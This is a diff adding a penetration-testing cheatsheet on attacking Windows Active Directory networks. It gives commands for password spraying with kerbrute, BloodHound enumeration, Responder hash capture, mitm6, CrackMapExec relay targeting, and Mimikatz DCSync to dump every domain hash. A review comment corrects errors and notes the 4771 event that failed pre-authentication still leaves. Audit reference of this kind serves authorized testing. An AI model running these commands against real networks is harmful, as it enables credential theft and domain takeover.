@@ -0,0 +1,150 @@
+---
+title: Internal Network Audit
+categories: [cheatsheets]
+tags: [windows, security, network, AD]
+---
+
+# Internal Network Audit
+
+## Low Hanging Fruits
+
+### AD User Details
+
+* use PowerView to list domain users with more information
+ - [https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView)
+ - Admin Account Flag
+ - lastlogon
+ - badpwdcount
+ - pwdlastset
+ - description (sometimes used to store passwords)
+
+* Get accountname & descriptions
+```
+Get-DomainUser | Select-Object -Properties samaccountname,description
+```
+* Get Accounts sorted by pwdlastset
+```
+Get-DomainUser -Properties samaccountname,pwdLastSet | where {$_.samaccountname -ne 'DefaultAccount' -AND $_.samaccountname -ne 'Guest'} | sort pwdLastSet | ft -wrap -autosize
+```
+
+### Password Spraying via Kerberos
+
+* using the Tool kerbrute by ropnop
+ - [https://github.com/ropnop/kerberos_windows_scripts](https://github.com/ropnop/kerberos_windows_scripts)
+ - [https://github.com/ropnop/kerbrute](https://github.com/ropnop/kerbrute)
+* uses kerberos preauthentication
+* only 2 UDP frames
+* no logon failure event (4625)
+* **Important:** note how many password trys are possible before locking an account
+
+```
+kerbrute passwordspray -d <domain> users.txt Summer2019!
+```
+
+### Bloodhound
+
+* Bloodhound Ingestors can be used to enumerate domain specific information from the DC
+* Ingestors:
+ - PS (default ingestor)
+ - python (`pip install blodohound`)
+ - C# (Sharphound)
+* can be executed from domain-joined and non-domain-joined computers.
+
+* With the python ingestor
+```
+# Domain-joined host, working DNS
+bloodhound-python -u user@DOMAIN -p PASSWORD
+
+# Non-Domain-Joined Hosts / DNS troubles
+bloodhound-python -u user@DOMAIN -p PASSWORD -d DOMAIN -dc DC1.DOMAIN.COM -gc DC1.DOMAIN.COM
+```
+
+* SharpHound
+```
+# get all information from the DC
+SharpHound.exe -c All
+# connects to any computer in the AD for 24h to get session information
+SharpHound.exe -c SessionLoop --MaxLoopTime 24h
+```
+
+### Local AD Accounts
+
+* check the local Serviec account if any AD account is used
+* open `Services` and sort by "Log On As"
+* -> Find AD Accounts
+* Mimikatz to get the (cleartext) password
+
+
+### Responder Action - Attacks against the NTLM authentication protocol
+
+* [https://github.com/lgandx/Responder](https://github.com/lgandx/Responder)
+* Responder is able to capture LLMNR & NetBios broadcast requests to capture NetNTLM hashes on the network
+* NetNTLM can be bruteforced (very slow, only possible with bad password policy)
+* NTLM relaying (see below)
+
+```
+sh> responder.py -c config -I eth0
+```
+
+* what triggers llmnr and NetBios broadcasts?
+ - If a domain cannot be resolved by DNS (wont work in new browsers)
+ - Set DNS entries as unprivileged users
+ - if IPv6 is not configured, it overrules IPv4 (Tool: MITM6)
+
+### mitm6
+
+* Code: [https://github.com/fox-it/mitm6](https://github.com/fox-it/mitm6)
+* Windows (since Windows Vista) prefers IPv6 over IPv4
+* If IPv6 is not configured, an attacker can abuse this preference by acting as malicious DNS server
+ - answers all DHCPv6 messages to setup a IPv6 ip as new DNS server on the victim machine.
+* Works perfect in combination with WPAD and NTLM relaying attacks
+* Details: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
+
+
+### DC Sync
+
+* Account with the rights "GenericAll" needed
+* Can be used for a dcsync attack with mimikatz (`lsadump::dcsync /domain:<domain> /all /csv`)
+* -> This gets every NTLM hash from the DC
+* -> krbtgt hash can be used to create golden tickets
+
+
+### Attacking SMB
+
+* Tool: CrackMapExec [https://github.com/byt3bl33d3r/CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
+* Detailed Wiki Page:
+ - [https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference](https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference)
+
+* Enumerating SMB shares and saving ips where SMB signing is disabled
+```
+sh> cme smb <cidr> --gen-relay-list targets.txt
+
+SMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
+SMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
+SMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
+SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
+```
+
+
+### Tipps: **GenericAll**
+
+* Access without changing the password of another user:
+ - Logon Script
+ - Kerberoasting
+ - AS-REP Roast
+ - DC Sync + DC Shadow to reset old password
+
+
+
+## More Advanced Attacks
+
+TODO
+
+### Kerberoasting
+
+### AS-REP Roast
+
+### NTLM relaying attack
+
+
+
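Review bot: the first PowerView command under "AD User Details" will not run as written, because `Select-Object` has no `-Properties` parameter (that is a `Get-DomainUser` parameter); use `Get-DomainUser -Properties samaccountname,description` or `Get-DomainUser | Select-Object samaccountname,description`, matching the form of the second command. In the Bloodhound ingestor list the pip package name is misspelled: `pip install blodohound` should read `pip install bloodhound`. The kerbrute bullet "no logon failure event (4625)" is misleading for a page aimed at auditing: 4625 is not generated on the target, but each failed Kerberos pre-authentication is still recorded on the domain controller as event 4771, so the bullet should say that and the "Important" note about lockout thresholds should be read together with it. Minor wording fixes for the same hunk: "Serviec" to "Service", "Tipps" to "Tips", "trys" to "tries", and "Set DNS entries as unprivileged users" under the LLMNR triggers should state what it means (that unprivileged domain users can by default create DNS records in AD-integrated zones), since as written it does not explain why it causes broadcasts.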